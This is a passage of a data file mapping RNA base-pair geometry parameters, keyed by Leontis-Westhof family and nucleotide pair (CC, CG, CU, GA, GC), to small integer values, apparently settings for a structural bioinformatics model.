"cHW_CC_tips_distance":4, "cHW_CC_C1'-B1-B1pair":3, "cHW_CC_B1-B1pair-C1'pair":2, "cHW_CC_C4'-C1'-B1-B1pair":1, "cHW_CC_B1-B1pair-C1'pair-C4'pair":2, "cHW_CC_alpha_1":2, "cHW_CC_alpha_2":2, "cHW_CC_dB1":2, "cHW_CC_dB2":3,
"tHW_CC_tips_distance":2, "tHW_CC_C1'-B1-B1pair":1, "tHW_CC_B1-B1pair-C1'pair":3, "tHW_CC_C4'-C1'-B1-B1pair":3, "tHW_CC_B1-B1pair-C1'pair-C4'pair":2, "tHW_CC_alpha_1":2, "tHW_CC_alpha_2":2, "tHW_CC_dB1":3, "tHW_CC_dB2":3,
"cWS_CC_tips_distance":3, "cWS_CC_C1'-B1-B1pair":2, "cWS_CC_B1-B1pair-C1'pair":2, "cWS_CC_C4'-C1'-B1-B1pair":1, "cWS_CC_B1-B1pair-C1'pair-C4'pair":1, "cWS_CC_alpha_1":2, "cWS_CC_alpha_2":3, "cWS_CC_dB1":2, "cWS_CC_dB2":1,
"tWS_CC_tips_distance":5, "tWS_CC_C1'-B1-B1pair":2, "tWS_CC_B1-B1pair-C1'pair":2, "tWS_CC_C4'-C1'-B1-B1pair":2, "tWS_CC_B1-B1pair-C1'pair-C4'pair":1, "tWS_CC_alpha_1":2, "tWS_CC_alpha_2":2, "tWS_CC_dB1":2, "tWS_CC_dB2":2,
"cSW_CC_tips_distance":3, "cSW_CC_C1'-B1-B1pair":2, "cSW_CC_B1-B1pair-C1'pair":2, "cSW_CC_C4'-C1'-B1-B1pair":2, "cSW_CC_B1-B1pair-C1'pair-C4'pair":1, "cSW_CC_alpha_1":3, "cSW_CC_alpha_2":2, "cSW_CC_dB1":2, "cSW_CC_dB2":2,
"tSW_CC_tips_distance":5, "tSW_CC_C1'-B1-B1pair":1, "tSW_CC_B1-B1pair-C1'pair":2, "tSW_CC_C4'-C1'-B1-B1pair":1, "tSW_CC_B1-B1pair-C1'pair-C4'pair":2, "tSW_CC_alpha_1":1, "tSW_CC_alpha_2":2, "tSW_CC_dB1":3, "tSW_CC_dB2":2,
"cHH_CC_tips_distance":5, "cHH_CC_C1'-B1-B1pair":1, "cHH_CC_B1-B1pair-C1'pair":1, "cHH_CC_C4'-C1'-B1-B1pair":1, "cHH_CC_B1-B1pair-C1'pair-C4'pair":1, "cHH_CC_alpha_1":2, "cHH_CC_alpha_2":1, "cHH_CC_dB1":7, "cHH_CC_dB2":7,
"tHH_CC_tips_distance":5, "tHH_CC_C1'-B1-B1pair":3, "tHH_CC_B1-B1pair-C1'pair":2, "tHH_CC_C4'-C1'-B1-B1pair":3, "tHH_CC_B1-B1pair-C1'pair-C4'pair":2, "tHH_CC_alpha_1":1, "tHH_CC_alpha_2":3, "tHH_CC_dB1":5, "tHH_CC_dB2":5,
"cSH_CC_tips_distance":3, "cSH_CC_C1'-B1-B1pair":2, "cSH_CC_B1-B1pair-C1'pair":2, "cSH_CC_C4'-C1'-B1-B1pair":2, "cSH_CC_B1-B1pair-C1'pair-C4'pair":2, "cSH_CC_alpha_1":3, "cSH_CC_alpha_2":2, "cSH_CC_dB1":5, "cSH_CC_dB2":2,
"tSH_CC_tips_distance":5, "tSH_CC_C1'-B1-B1pair":2, "tSH_CC_B1-B1pair-C1'pair":1, "tSH_CC_C4'-C1'-B1-B1pair":2, "tSH_CC_B1-B1pair-C1'pair-C4'pair":2, "tSH_CC_alpha_1":3, "tSH_CC_alpha_2":1, "tSH_CC_dB1":4, "tSH_CC_dB2":2,
"cHS_CC_tips_distance":3, "cHS_CC_C1'-B1-B1pair":2, "cHS_CC_B1-B1pair-C1'pair":2, "cHS_CC_C4'-C1'-B1-B1pair":2, "cHS_CC_B1-B1pair-C1'pair-C4'pair":2, "cHS_CC_alpha_1":3, "cHS_CC_alpha_2":2, "cHS_CC_dB1":2, "cHS_CC_dB2":2,
"tHS_CC_tips_distance":5, "tHS_CC_C1'-B1-B1pair":3, "tHS_CC_B1-B1pair-C1'pair":1, "tHS_CC_C4'-C1'-B1-B1pair":2, "tHS_CC_B1-B1pair-C1'pair-C4'pair":3, "tHS_CC_alpha_1":1, "tHS_CC_alpha_2":2, "tHS_CC_dB1":4, "tHS_CC_dB2":4,
"cSS_CC_tips_distance":5, "cSS_CC_C1'-B1-B1pair":2, "cSS_CC_B1-B1pair-C1'pair":2, "cSS_CC_C4'-C1'-B1-B1pair":2, "cSS_CC_B1-B1pair-C1'pair-C4'pair":1, "cSS_CC_alpha_1":1, "cSS_CC_alpha_2":3, "cSS_CC_dB1":1, "cSS_CC_dB2":3,
"tSS_CC_tips_distance":5, "tSS_CC_C1'-B1-B1pair":2, "tSS_CC_B1-B1pair-C1'pair":2, "tSS_CC_C4'-C1'-B1-B1pair":3, "tSS_CC_B1-B1pair-C1'pair-C4'pair":2, "tSS_CC_alpha_1":3, "tSS_CC_alpha_2":2, "tSS_CC_dB1":2, "tSS_CC_dB2":1,
"cWW_CG_tips_distance":5, "cWW_CG_C1'-B1-B1pair":2, "cWW_CG_B1-B1pair-C1'pair":1, "cWW_CG_C4'-C1'-B1-B1pair":2, "cWW_CG_B1-B1pair-C1'pair-C4'pair":2, "cWW_CG_alpha_1":2, "cWW_CG_alpha_2":3, "cWW_CG_dB1":2, "cWW_CG_dB2":2,
"tWW_CG_tips_distance":3, "tWW_CG_C1'-B1-B1pair":1, "tWW_CG_B1-B1pair-C1'pair":2, "tWW_CG_C4'-C1'-B1-B1pair":2, "tWW_CG_B1-B1pair-C1'pair-C4'pair":2, "tWW_CG_alpha_1":2, "tWW_CG_alpha_2":1, "tWW_CG_dB1":1, "tWW_CG_dB2":4,
"cWH_CG_tips_distance":3, "cWH_CG_C1'-B1-B1pair":1, "cWH_CG_B1-B1pair-C1'pair":1, "cWH_CG_C4'-C1'-B1-B1pair":2, "cWH_CG_B1-B1pair-C1'pair-C4'pair":2, "cWH_CG_alpha_1":2, "cWH_CG_alpha_2":1, "cWH_CG_dB1":4, "cWH_CG_dB2":2,
"tWH_CG_tips_distance":4, "tWH_CG_C1'-B1-B1pair":2, "tWH_CG_B1-B1pair-C1'pair":1, "tWH_CG_C4'-C1'-B1-B1pair":2, "tWH_CG_B1-B1pair-C1'pair-C4'pair":3, "tWH_CG_alpha_1":2, "tWH_CG_alpha_2":1, "tWH_CG_dB1":3, "tWH_CG_dB2":2,
"cHW_CG_tips_distance":3, "cHW_CG_C1'-B1-B1pair":2, "cHW_CG_B1-B1pair-C1'pair":2, "cHW_CG_C4'-C1'-B1-B1pair":1, "cHW_CG_B1-B1pair-C1'pair-C4'pair":2, "cHW_CG_alpha_1":1, "cHW_CG_alpha_2":2, "cHW_CG_dB1":2, "cHW_CG_dB2":2,
"tHW_CG_tips_distance":5, "tHW_CG_C1'-B1-B1pair":1, "tHW_CG_B1-B1pair-C1'pair":2, "tHW_CG_C4'-C1'-B1-B1pair":1, "tHW_CG_B1-B1pair-C1'pair-C4'pair":2, "tHW_CG_alpha_1":3, "tHW_CG_alpha_2":2, "tHW_CG_dB1":4, "tHW_CG_dB2":3,
"cWS_CG_tips_distance":2, "cWS_CG_C1'-B1-B1pair":1, "cWS_CG_B1-B1pair-C1'pair":1, "cWS_CG_C4'-C1'-B1-B1pair":2, "cWS_CG_B1-B1pair-C1'pair-C4'pair":1, "cWS_CG_alpha_1":1, "cWS_CG_alpha_2":2, "cWS_CG_dB1":2, "cWS_CG_dB2":3,
"tWS_CG_tips_distance":2, "tWS_CG_C1'-B1-B1pair":3, "tWS_CG_B1-B1pair-C1'pair":1, "tWS_CG_C4'-C1'-B1-B1pair":2, "tWS_CG_B1-B1pair-C1'pair-C4'pair":1, "tWS_CG_alpha_1":2, "tWS_CG_alpha_2":1, "tWS_CG_dB1":2, "tWS_CG_dB2":4,
"cSW_CG_tips_distance":7, "cSW_CG_C1'-B1-B1pair":1, "cSW_CG_B1-B1pair-C1'pair":2, "cSW_CG_C4'-C1'-B1-B1pair":2, "cSW_CG_B1-B1pair-C1'pair-C4'pair":3, "cSW_CG_alpha_1":1, "cSW_CG_alpha_2":2, "cSW_CG_dB1":1, "cSW_CG_dB2":3,
"tSW_CG_tips_distance":4, "tSW_CG_C1'-B1-B1pair":1, "tSW_CG_B1-B1pair-C1'pair":2, "tSW_CG_C4'-C1'-B1-B1pair":3, "tSW_CG_B1-B1pair-C1'pair-C4'pair":2, "tSW_CG_alpha_1":1, "tSW_CG_alpha_2":2, "tSW_CG_dB1":7, "tSW_CG_dB2":2,
"cHH_CG_tips_distance":1, "cHH_CG_C1'-B1-B1pair":1, "cHH_CG_B1-B1pair-C1'pair":2, "cHH_CG_C4'-C1'-B1-B1pair":3, "cHH_CG_B1-B1pair-C1'pair-C4'pair":2, "cHH_CG_alpha_1":1, "cHH_CG_alpha_2":2, "cHH_CG_dB1":4, "cHH_CG_dB2":1,
"tHH_CG_tips_distance":8, "tHH_CG_C1'-B1-B1pair":2, "tHH_CG_B1-B1pair-C1'pair":2, "tHH_CG_C4'-C1'-B1-B1pair":3, "tHH_CG_B1-B1pair-C1'pair-C4'pair":2, "tHH_CG_alpha_1":2, "tHH_CG_alpha_2":3, "tHH_CG_dB1":3, "tHH_CG_dB2":4,
"cSH_CG_tips_distance":5, "cSH_CG_C1'-B1-B1pair":1, "cSH_CG_B1-B1pair-C1'pair":2, "cSH_CG_C4'-C1'-B1-B1pair":2, "cSH_CG_B1-B1pair-C1'pair-C4'pair":2, "cSH_CG_alpha_1":1, "cSH_CG_alpha_2":2, "cSH_CG_dB1":6, "cSH_CG_dB2":4,
"tSH_CG_tips_distance":5, "tSH_CG_C1'-B1-B1pair":1, "tSH_CG_B1-B1pair-C1'pair":2, "tSH_CG_C4'-C1'-B1-B1pair":2, "tSH_CG_B1-B1pair-C1'pair-C4'pair":1, "tSH_CG_alpha_1":1, "tSH_CG_alpha_2":3, "tSH_CG_dB1":2, "tSH_CG_dB2":3,
"cHS_CG_tips_distance":4, "cHS_CG_C1'-B1-B1pair":2, "cHS_CG_B1-B1pair-C1'pair":2, "cHS_CG_C4'-C1'-B1-B1pair":3, "cHS_CG_B1-B1pair-C1'pair-C4'pair":2, "cHS_CG_alpha_1":2, "cHS_CG_alpha_2":3, "cHS_CG_dB1":5, "cHS_CG_dB2":2,
"tHS_CG_tips_distance":4, "tHS_CG_C1'-B1-B1pair":1, "tHS_CG_B1-B1pair-C1'pair":2, "tHS_CG_C4'-C1'-B1-B1pair":3, "tHS_CG_B1-B1pair-C1'pair-C4'pair":1, "tHS_CG_alpha_1":1, "tHS_CG_alpha_2":1, "tHS_CG_dB1":3, "tHS_CG_dB2":2,
"cSS_CG_tips_distance":1, "cSS_CG_C1'-B1-B1pair":2, "cSS_CG_B1-B1pair-C1'pair":1, "cSS_CG_C4'-C1'-B1-B1pair":2, "cSS_CG_B1-B1pair-C1'pair-C4'pair":1, "cSS_CG_alpha_1":1, "cSS_CG_alpha_2":2, "cSS_CG_dB1":3, "cSS_CG_dB2":3,
"tSS_CG_tips_distance":5, "tSS_CG_C1'-B1-B1pair":2, "tSS_CG_B1-B1pair-C1'pair":2, "tSS_CG_C4'-C1'-B1-B1pair":1, "tSS_CG_B1-B1pair-C1'pair-C4'pair":2, "tSS_CG_alpha_1":1, "tSS_CG_alpha_2":2, "tSS_CG_dB1":1, "tSS_CG_dB2":2,
"cWW_CU_tips_distance":4, "cWW_CU_C1'-B1-B1pair":1, "cWW_CU_B1-B1pair-C1'pair":1, "cWW_CU_C4'-C1'-B1-B1pair":2, "cWW_CU_B1-B1pair-C1'pair-C4'pair":2, "cWW_CU_alpha_1":1, "cWW_CU_alpha_2":1, "cWW_CU_dB1":1, "cWW_CU_dB2":1,
"tWW_CU_tips_distance":1, "tWW_CU_C1'-B1-B1pair":2, "tWW_CU_B1-B1pair-C1'pair":2, "tWW_CU_C4'-C1'-B1-B1pair":2, "tWW_CU_B1-B1pair-C1'pair-C4'pair":2, "tWW_CU_alpha_1":1, "tWW_CU_alpha_2":2, "tWW_CU_dB1":2, "tWW_CU_dB2":1,
"cWH_CU_tips_distance":5, "cWH_CU_C1'-B1-B1pair":2, "cWH_CU_B1-B1pair-C1'pair":2, "cWH_CU_C4'-C1'-B1-B1pair":2, "cWH_CU_B1-B1pair-C1'pair-C4'pair":2, "cWH_CU_alpha_1":3, "cWH_CU_alpha_2":2, "cWH_CU_dB1":3, "cWH_CU_dB2":1,
"tWH_CU_tips_distance":1, "tWH_CU_C1'-B1-B1pair":2, "tWH_CU_B1-B1pair-C1'pair":2, "tWH_CU_C4'-C1'-B1-B1pair":3, "tWH_CU_B1-B1pair-C1'pair-C4'pair":2, "tWH_CU_alpha_1":3, "tWH_CU_alpha_2":3, "tWH_CU_dB1":5, "tWH_CU_dB2":2,
"cHW_CU_tips_distance":3, "cHW_CU_C1'-B1-B1pair":2, "cHW_CU_B1-B1pair-C1'pair":2, "cHW_CU_C4'-C1'-B1-B1pair":1, "cHW_CU_B1-B1pair-C1'pair-C4'pair":3, "cHW_CU_alpha_1":2, "cHW_CU_alpha_2":2, "cHW_CU_dB1":1, "cHW_CU_dB2":3,
"tHW_CU_tips_distance":8, "tHW_CU_C1'-B1-B1pair":1, "tHW_CU_B1-B1pair-C1'pair":1, "tHW_CU_C4'-C1'-B1-B1pair":3, "tHW_CU_B1-B1pair-C1'pair-C4'pair":2, "tHW_CU_alpha_1":1, "tHW_CU_alpha_2":2, "tHW_CU_dB1":3, "tHW_CU_dB2":3,
"cWS_CU_tips_distance":4, "cWS_CU_C1'-B1-B1pair":1, "cWS_CU_B1-B1pair-C1'pair":2, "cWS_CU_C4'-C1'-B1-B1pair":3, "cWS_CU_B1-B1pair-C1'pair-C4'pair":2, "cWS_CU_alpha_1":3, "cWS_CU_alpha_2":2, "cWS_CU_dB1":4, "cWS_CU_dB2":2,
"tWS_CU_tips_distance":5, "tWS_CU_C1'-B1-B1pair":3, "tWS_CU_B1-B1pair-C1'pair":1, "tWS_CU_C4'-C1'-B1-B1pair":2, "tWS_CU_B1-B1pair-C1'pair-C4'pair":2, "tWS_CU_alpha_1":2, "tWS_CU_alpha_2":1, "tWS_CU_dB1":3, "tWS_CU_dB2":5,
"cSW_CU_tips_distance":3, "cSW_CU_C1'-B1-B1pair":2, "cSW_CU_B1-B1pair-C1'pair":2, "cSW_CU_C4'-C1'-B1-B1pair":2, "cSW_CU_B1-B1pair-C1'pair-C4'pair":3, "cSW_CU_alpha_1":3, "cSW_CU_alpha_2":3, "cSW_CU_dB1":2, "cSW_CU_dB2":4,
"tSW_CU_tips_distance":7, "tSW_CU_C1'-B1-B1pair":2, "tSW_CU_B1-B1pair-C1'pair":2, "tSW_CU_C4'-C1'-B1-B1pair":2, "tSW_CU_B1-B1pair-C1'pair-C4'pair":2, "tSW_CU_alpha_1":2, "tSW_CU_alpha_2":2, "tSW_CU_dB1":2, "tSW_CU_dB2":2,
"cHH_CU_tips_distance":6, "cHH_CU_C1'-B1-B1pair":2, "cHH_CU_B1-B1pair-C1'pair":1, "cHH_CU_C4'-C1'-B1-B1pair":2, "cHH_CU_B1-B1pair-C1'pair-C4'pair":3, "cHH_CU_alpha_1":1, "cHH_CU_alpha_2":1, "cHH_CU_dB1":2, "cHH_CU_dB2":4,
"tHH_CU_tips_distance":5, "tHH_CU_C1'-B1-B1pair":3, "tHH_CU_B1-B1pair-C1'pair":2, "tHH_CU_C4'-C1'-B1-B1pair":2, "tHH_CU_B1-B1pair-C1'pair-C4'pair":1, "tHH_CU_alpha_1":2, "tHH_CU_alpha_2":2, "tHH_CU_dB1":2, "tHH_CU_dB2":2,
"cSH_CU_tips_distance":5, "cSH_CU_C1'-B1-B1pair":2, "cSH_CU_B1-B1pair-C1'pair":2, "cSH_CU_C4'-C1'-B1-B1pair":2, "cSH_CU_B1-B1pair-C1'pair-C4'pair":1, "cSH_CU_alpha_1":1, "cSH_CU_alpha_2":1, "cSH_CU_dB1":4, "cSH_CU_dB2":2,
"tSH_CU_tips_distance":5, "tSH_CU_C1'-B1-B1pair":2, "tSH_CU_B1-B1pair-C1'pair":3, "tSH_CU_C4'-C1'-B1-B1pair":2, "tSH_CU_B1-B1pair-C1'pair-C4'pair":2, "tSH_CU_alpha_1":3, "tSH_CU_alpha_2":3, "tSH_CU_dB1":4, "tSH_CU_dB2":2,
"cHS_CU_tips_distance":2, "cHS_CU_C1'-B1-B1pair":1, "cHS_CU_B1-B1pair-C1'pair":2, "cHS_CU_C4'-C1'-B1-B1pair":2, "cHS_CU_B1-B1pair-C1'pair-C4'pair":2, "cHS_CU_alpha_1":1, "cHS_CU_alpha_2":2, "cHS_CU_dB1":2, "cHS_CU_dB2":4,
"tHS_CU_tips_distance":8, "tHS_CU_C1'-B1-B1pair":2, "tHS_CU_B1-B1pair-C1'pair":1, "tHS_CU_C4'-C1'-B1-B1pair":2, "tHS_CU_B1-B1pair-C1'pair-C4'pair":2, "tHS_CU_alpha_1":2, "tHS_CU_alpha_2":2, "tHS_CU_dB1":3, "tHS_CU_dB2":4,
"cSS_CU_tips_distance":5, "cSS_CU_C1'-B1-B1pair":2, "cSS_CU_B1-B1pair-C1'pair":2, "cSS_CU_C4'-C1'-B1-B1pair":1, "cSS_CU_B1-B1pair-C1'pair-C4'pair":1, "cSS_CU_alpha_1":2, "cSS_CU_alpha_2":3, "cSS_CU_dB1":6, "cSS_CU_dB2":1,
"tSS_CU_tips_distance":5, "tSS_CU_C1'-B1-B1pair":2, "tSS_CU_B1-B1pair-C1'pair":3, "tSS_CU_C4'-C1'-B1-B1pair":2, "tSS_CU_B1-B1pair-C1'pair-C4'pair":2, "tSS_CU_alpha_1":3, "tSS_CU_alpha_2":3, "tSS_CU_dB1":7, "tSS_CU_dB2":2,
"cWW_GA_tips_distance":5, "cWW_GA_C1'-B1-B1pair":1, "cWW_GA_B1-B1pair-C1'pair":1, "cWW_GA_C4'-C1'-B1-B1pair":2, "cWW_GA_B1-B1pair-C1'pair-C4'pair":2, "cWW_GA_alpha_1":1, "cWW_GA_alpha_2":1, "cWW_GA_dB1":2, "cWW_GA_dB2":1,
"tWW_GA_tips_distance":6, "tWW_GA_C1'-B1-B1pair":1, "tWW_GA_B1-B1pair-C1'pair":1, "tWW_GA_C4'-C1'-B1-B1pair":1, "tWW_GA_B1-B1pair-C1'pair-C4'pair":2, "tWW_GA_alpha_1":2, "tWW_GA_alpha_2":2, "tWW_GA_dB1":1, "tWW_GA_dB2":2,
"cWH_GA_tips_distance":2, "cWH_GA_C1'-B1-B1pair":1, "cWH_GA_B1-B1pair-C1'pair":1, "cWH_GA_C4'-C1'-B1-B1pair":3, "cWH_GA_B1-B1pair-C1'pair-C4'pair":2, "cWH_GA_alpha_1":2, "cWH_GA_alpha_2":1, "cWH_GA_dB1":2, "cWH_GA_dB2":2,
"tWH_GA_tips_distance":7, "tWH_GA_C1'-B1-B1pair":1, "tWH_GA_B1-B1pair-C1'pair":2, "tWH_GA_C4'-C1'-B1-B1pair":1, "tWH_GA_B1-B1pair-C1'pair-C4'pair":2, "tWH_GA_alpha_1":2, "tWH_GA_alpha_2":2, "tWH_GA_dB1":1, "tWH_GA_dB2":6,
"cHW_GA_tips_distance":4, "cHW_GA_C1'-B1-B1pair":2, "cHW_GA_B1-B1pair-C1'pair":2, "cHW_GA_C4'-C1'-B1-B1pair":2, "cHW_GA_B1-B1pair-C1'pair-C4'pair":3, "cHW_GA_alpha_1":1, "cHW_GA_alpha_2":2, "cHW_GA_dB1":1, "cHW_GA_dB2":4,
"tHW_GA_tips_distance":3, "tHW_GA_C1'-B1-B1pair":2, "tHW_GA_B1-B1pair-C1'pair":1, "tHW_GA_C4'-C1'-B1-B1pair":2, "tHW_GA_B1-B1pair-C1'pair-C4'pair":2, "tHW_GA_alpha_1":1, "tHW_GA_alpha_2":2, "tHW_GA_dB1":3, "tHW_GA_dB2":1,
"cWS_GA_tips_distance":6, "cWS_GA_C1'-B1-B1pair":3, "cWS_GA_B1-B1pair-C1'pair":2, "cWS_GA_C4'-C1'-B1-B1pair":2, "cWS_GA_B1-B1pair-C1'pair-C4'pair":1, "cWS_GA_alpha_1":2, "cWS_GA_alpha_2":3, "cWS_GA_dB1":3, "cWS_GA_dB2":4,
"tWS_GA_tips_distance":5, "tWS_GA_C1'-B1-B1pair":3, "tWS_GA_B1-B1pair-C1'pair":2, "tWS_GA_C4'-C1'-B1-B1pair":1, "tWS_GA_B1-B1pair-C1'pair-C4'pair":1, "tWS_GA_alpha_1":2, "tWS_GA_alpha_2":2, "tWS_GA_dB1":2, "tWS_GA_dB2":5,
"cSW_GA_tips_distance":4, "cSW_GA_C1'-B1-B1pair":1, "cSW_GA_B1-B1pair-C1'pair":1, "cSW_GA_C4'-C1'-B1-B1pair":1, "cSW_GA_B1-B1pair-C1'pair-C4'pair":1, "cSW_GA_alpha_1":1, "cSW_GA_alpha_2":2, "cSW_GA_dB1":1, "cSW_GA_dB2":2,
"tSW_GA_tips_distance":2, "tSW_GA_C1'-B1-B1pair":1, "tSW_GA_B1-B1pair-C1'pair":2, "tSW_GA_C4'-C1'-B1-B1pair":1, "tSW_GA_B1-B1pair-C1'pair-C4'pair":2, "tSW_GA_alpha_1":1, "tSW_GA_alpha_2":3, "tSW_GA_dB1":2, "tSW_GA_dB2":2,
"cHH_GA_tips_distance":3, "cHH_GA_C1'-B1-B1pair":2, "cHH_GA_B1-B1pair-C1'pair":2, "cHH_GA_C4'-C1'-B1-B1pair":2, "cHH_GA_B1-B1pair-C1'pair-C4'pair":2, "cHH_GA_alpha_1":2, "cHH_GA_alpha_2":3, "cHH_GA_dB1":2, "cHH_GA_dB2":3,
"tHH_GA_tips_distance":3, "tHH_GA_C1'-B1-B1pair":3, "tHH_GA_B1-B1pair-C1'pair":2, "tHH_GA_C4'-C1'-B1-B1pair":2, "tHH_GA_B1-B1pair-C1'pair-C4'pair":2, "tHH_GA_alpha_1":1, "tHH_GA_alpha_2":2, "tHH_GA_dB1":3, "tHH_GA_dB2":2,
"cSH_GA_tips_distance":1, "cSH_GA_C1'-B1-B1pair":2, "cSH_GA_B1-B1pair-C1'pair":2, "cSH_GA_C4'-C1'-B1-B1pair":2, "cSH_GA_B1-B1pair-C1'pair-C4'pair":2, "cSH_GA_alpha_1":1, "cSH_GA_alpha_2":2, "cSH_GA_dB1":2, "cSH_GA_dB2":1,
"tSH_GA_tips_distance":3, "tSH_GA_C1'-B1-B1pair":1, "tSH_GA_B1-B1pair-C1'pair":1, "tSH_GA_C4'-C1'-B1-B1pair":2, "tSH_GA_B1-B1pair-C1'pair-C4'pair":2, "tSH_GA_alpha_1":2, "tSH_GA_alpha_2":2, "tSH_GA_dB1":2, "tSH_GA_dB2":7,
"cHS_GA_tips_distance":5, "cHS_GA_C1'-B1-B1pair":3, "cHS_GA_B1-B1pair-C1'pair":3, "cHS_GA_C4'-C1'-B1-B1pair":3, "cHS_GA_B1-B1pair-C1'pair-C4'pair":2, "cHS_GA_alpha_1":2, "cHS_GA_alpha_2":2, "cHS_GA_dB1":3, "cHS_GA_dB2":4,
"tHS_GA_tips_distance":5, "tHS_GA_C1'-B1-B1pair":3, "tHS_GA_B1-B1pair-C1'pair":1, "tHS_GA_C4'-C1'-B1-B1pair":3, "tHS_GA_B1-B1pair-C1'pair-C4'pair":2, "tHS_GA_alpha_1":2, "tHS_GA_alpha_2":1, "tHS_GA_dB1":1, "tHS_GA_dB2":2,
"cSS_GA_tips_distance":4, "cSS_GA_C1'-B1-B1pair":3, "cSS_GA_B1-B1pair-C1'pair":2, "cSS_GA_C4'-C1'-B1-B1pair":1, "cSS_GA_B1-B1pair-C1'pair-C4'pair":1, "cSS_GA_alpha_1":2, "cSS_GA_alpha_2":1, "cSS_GA_dB1":1, "cSS_GA_dB2":1,
"tSS_GA_tips_distance":4, "tSS_GA_C1'-B1-B1pair":1, "tSS_GA_B1-B1pair-C1'pair":1, "tSS_GA_C4'-C1'-B1-B1pair":1, "tSS_GA_B1-B1pair-C1'pair-C4'pair":1, "tSS_GA_alpha_1":1, "tSS_GA_alpha_2":2, "tSS_GA_dB1":5, "tSS_GA_dB2":2,
"cWW_GC_tips_distance":5, "cWW_GC_C1'-B1-B1pair":1, "cWW_GC_B1-B1pair-C1'pair":2, "cWW_GC_C4'-C1'-B1-B1pair":2, "cWW_GC_B1-B1pair-C1'pair-C4'pair":2, "cWW_GC_alpha_1":2, "cWW_GC_alpha_2":1, "cWW_GC_dB1":2, "cWW_GC_dB2":3,
"tWW_GC_tips_distance":3, "tWW_GC_C1'-B1-B1pair":1, "tWW_GC_B1-B1pair-C1'pair":2, "tWW_GC_C4'-C1'-B1-B1pair":2, "tWW_GC_B1-B1pair-C1'pair-C4'pair":2, "tWW_GC_alpha_1":1, "tWW_GC_alpha_2":2, "tWW_GC_dB1":3, "tWW_GC_dB2":4,
"cWH_GC_tips_distance":7, "cWH_GC_C1'-B1-B1pair":2, "cWH_GC_B1-B1pair-C1'pair":2, "cWH_GC_C4'-C1'-B1-B1pair":2, "cWH_GC_B1-B1pair-C1'pair-C4'pair":1, "cWH_GC_alpha_1":2, "cWH_GC_alpha_2":2, "cWH_GC_dB1":2, "cWH_GC_dB2":3,
"tWH_GC_tips_distance":5, "tWH_GC_C1'-B1-B1pair":1, "tWH_GC_B1-B1pair-C1'pair":1, "tWH_GC_C4'-C1'-B1-B1pair":2, "tWH_GC_B1-B1pair-C1'pair-C4'pair":2, "tWH_GC_alpha_1":3, "tWH_GC_alpha_2":3, "tWH_GC_dB1":2, "tWH_GC_dB2":2,
"cHW_GC_tips_distance":4, "cHW_GC_C1'-B1-B1pair":1, "cHW_GC_B1-B1pair-C1'pair":1, "cHW_GC_C4'-C1'-B1-B1pair":2, "cHW_GC_B1-B1pair-C1'pair-C4'pair":2, "cHW_GC_alpha_1":1, "cHW_GC_alpha_2":1, "cHW_GC_dB1":3, "cHW_GC_dB2":4,
"tHW_GC_tips_distance":5, "tHW_GC_C1'-B1-B1pair":2, "tHW_GC_B1-B1pair-C1'pair":2, "tHW_GC_C4'-C1'-B1-B1pair":2, "tHW_GC_B1-B1pair-C1'pair-C4'pair":2, "tHW_GC_alpha_1":2, "tHW_GC_alpha_2":2, "tHW_GC_dB1":2, "tHW_GC_dB2":4,
"cWS_GC_tips_distance":8, "cWS_GC_C1'-B1-B1pair":1, "cWS_GC_B1-B1pair-C1'pair":1, "cWS_GC_C4'-C1'-B1-B1pair":2, "cWS_GC_B1-B1pair-C1'pair-C4'pair":2, "cWS_GC_alpha_1":2, "cWS_GC_alpha_2":1, "cWS_GC_dB1":2, "cWS_GC_dB2":1,
"tWS_GC_tips_distance":2, "tWS_GC_C1'-B1-B1pair":1, "tWS_GC_B1-B1pair-C1'pair":1, "tWS_GC_C4'-C1'-B1-B1pair":3, "tWS_GC_B1-B1pair-C1'pair-C4'pair":2, "tWS_GC_alpha_1":2, "tWS_GC_alpha_2":1, "tWS_GC_dB1":4, "tWS_GC_dB2":5,
"cSW_GC_tips_distance":4, "cSW_GC_C1'-B1-B1pair":2, "cSW_GC_B1-B1pair-C1'pair":3, "cSW_GC_C4'-C1'-B1-B1pair":1, "cSW_GC_B1-B1pair-C1'pair-C4'pair":2, "cSW_GC_alpha_1":3, "cSW_GC_alpha_2":2, "cSW_GC_dB1":3, "cSW_GC_dB2":2,
"tSW_GC_tips_distance":2, "tSW_GC_C1'-B1-B1pair":1, "tSW_GC_B1-B1pair-C1'pair":3, "tSW_GC_C4'-C1'-B1-B1pair":1, "tSW_GC_B1-B1pair-C1'pair-C4'pair":2, "tSW_GC_alpha_1":2, "tSW_GC_alpha_2":2, "tSW_GC_dB1":4, "tSW_GC_dB2":2,
"cHH_GC_tips_distance":1, "cHH_GC_C1'-B1-B1pair":3, "cHH_GC_B1-B1pair-C1'pair":1, "cHH_GC_C4'-C1'-B1-B1pair":2, "cHH_GC_B1-B1pair-C1'pair-C4'pair":1, "cHH_GC_alpha_1":2, "cHH_GC_alpha_2":2, "cHH_GC_dB1":3, "cHH_GC_dB2":3,
"tHH_GC_tips_distance":8, "tHH_GC_C1'-B1-B1pair":2, "tHH_GC_B1-B1pair-C1'pair":1, "tHH_GC_C4'-C1'-B1-B1pair":2, "tHH_GC_B1-B1pair-C1'pair-C4'pair":2, "tHH_GC_alpha_1":3, "tHH_GC_alpha_2":1, "tHH_GC_dB1":6, "tHH_GC_dB2":3,
"cSH_GC_tips_distance":8, "cSH_GC_C1'-B1-B1pair":2, "cSH_GC_B1-B1pair-C1'pair":3, "cSH_GC_C4'-C1'-B1-B1pair":1, "cSH_GC_B1-B1pair-C1'pair-C4'pair":3, "cSH_GC_alpha_1":2, "cSH_GC_alpha_2":2, "cSH_GC_dB1":5, "cSH_GC_dB2":4,
"tSH_GC_tips_distance":4, "tSH_GC_C1'-B1-B1pair":1, "tSH_GC_B1-B1pair-C1'pair":2, "tSH_GC_C4'-C1'-B1-B1pair":1, "tSH_GC_B1-B1pair-C1'pair-C4'pair":4, "tSH_GC_alpha_1":1, "tSH_GC_alpha_2":2, "tSH_GC_dB1":2, "tSH_GC_dB2":3,
"cHS_GC_tips_distance":5, "cHS_GC_C1'-B1-B1pair":2, "cHS_GC_B1-B1pair-C1'pair":2, "cHS_GC_C4'-C1'-B1-B1pair":2, "cHS_GC_B1-B1pair-C1'pair-C4'pair":2, "cHS_GC_alpha_1":3, "cHS_GC_alpha_2":1, "cHS_GC_dB1":2, "cHS_GC_dB2":5,
